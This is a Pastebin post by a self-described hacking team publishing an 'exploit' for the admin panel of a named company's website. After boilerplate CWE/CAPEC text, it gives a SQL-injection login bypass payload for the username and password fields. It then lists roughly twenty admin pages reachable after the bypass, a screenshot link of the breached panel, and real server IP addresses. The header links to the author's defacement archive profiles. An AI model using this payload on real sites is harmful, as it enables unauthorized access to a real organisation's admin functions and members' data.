KingSkrupellos

Suvega Digital Media Pvt Ltd Improper Authentication

May 5th, 2020
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.59 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Suvega Digital Media Pvt Ltd Improper Authentication
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 03 May 2020
  7. # Vendor Homepage : suvegadigital.com
  8. suvega-digital-media-pvt-ltd.business.site
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Exploit Risk : Medium
  12. # Vulnerability Type : CWE-287 [ Improper Authentication ]
  13. CAPEC-115: Authentication Bypass
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
  17. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  18. zone-h.org/archive/notifier=CyBeRiZM
  19. # Mirror-H : mirror-h.org/search/hacker/948/
  20. mirror-h.org/search/hacker/94/
  21. mirror-h.org/search/hacker/1826/
  22. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
  23. defacer.id/archive/team/Cyberizm-Org
  24. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
  25. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
  26. aljyyosh.org/hacker.php?id=Cyberizm.Org
  27. aljyyosh.org/hacker.php?id=Cyberizm
  28. # Zone-D : zone-d.org/attacker/id/69
  29. # Pastebin : pastebin.com/u/KingSkrupellos
  30. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
  31.  
  32. ####################################################################
  33.  
  34. # Impact :
  35. ***********
  36. CWE-287 [ Improper Authentication ]
  37.  
  38. Authentication is any process by which a system verifies the identity of a user who wishes
  39. to access it.When an actor claims to have a given identity, the software does not
  40. prove or insufficiently proves that the claim is correct. Improper authentication
  41. occurs when an application improperly verifies the identity of a user.
  42. A software incorrectly validates user's login information and as a result, an attacker can
  43. gain certain privileges within the application or disclose sensitive information that allows
  44. them to access sensitive data and provoke arbitrary code execution.
  45. The weakness is introduced during Architecture and Design, Implementation stages.
  46.  
  47. CAPEC-115 [ Authentication Bypass ]
  48.  
  49. An attacker gains access to application, service, or device with the privileges
  50. of an authorized or privileged user by evading or circumventing an authentication mechanism.
  51. The attacker is therefore able to access protected data without authentication ever having taken place.
  52. This refers to an attacker gaining access equivalent to an authenticated user without ever going
  53. through an authentication procedure. This is usually the result of the attacker using an unexpected
  54. access procedure that does not go through the proper checkpoints where authentication should occur.
  55. For example, a web site might assume that all users will click through a given link in order to get to
  56. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
  57. able to reach secured web content by explicitly entering the path to the content rather than clicking
  58. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
  59. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
  60. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
  61.  
  62. ####################################################################
  63.  
  64. # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
  65. ******************************************************************************
  66. /admin/login.php
  67.  
  68. Administrator Username : '=''or'
  69. Administrator Password : '=''or'
  70.  
  71. /admin/home.php
  72. /admin/all-members.php
  73. /admin/add-member.php
  74. /admin/edit-member.php?id=1
  75. /admin/old-members.php
  76. /admin/add-old-member.php
  77. /admin/doa-awards.php
  78. /admin/add-awards.php
  79. /admin/doa-awards.php
  80. /admin/add-awards.php
  81. /admin/event-gallery.php
  82. /admin/add-upcoming-event.php
  83. /admin/add-event-gallery.php
  84. /admin/archive-event.php
  85. /admin/add-archive-event.php
  86. /admin/past-member.php
  87. /admin/add-past-member.php
  88. /admin/journal-archive.php
  89. /admin/add-journal-archive.php
  90. /admin/register-member-list.php
  91. /admin/member-list.php
  92.  
  93. ScreenShot Administrator Control Panel =>
  94.  
  95. https://www.upload.ee/image/11634796/suvegaadminpanel05052020.png
  96.  
  97. Reverse IP results (35.154.89.20)
  98. Reverse IP results (13.232.175.218)
  99. Total 6 Domains
  100.  
  101. ####################################################################
  102.  
  103. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  104.  
  105. ####################################################################
Add Comment
Please, Sign In to add comment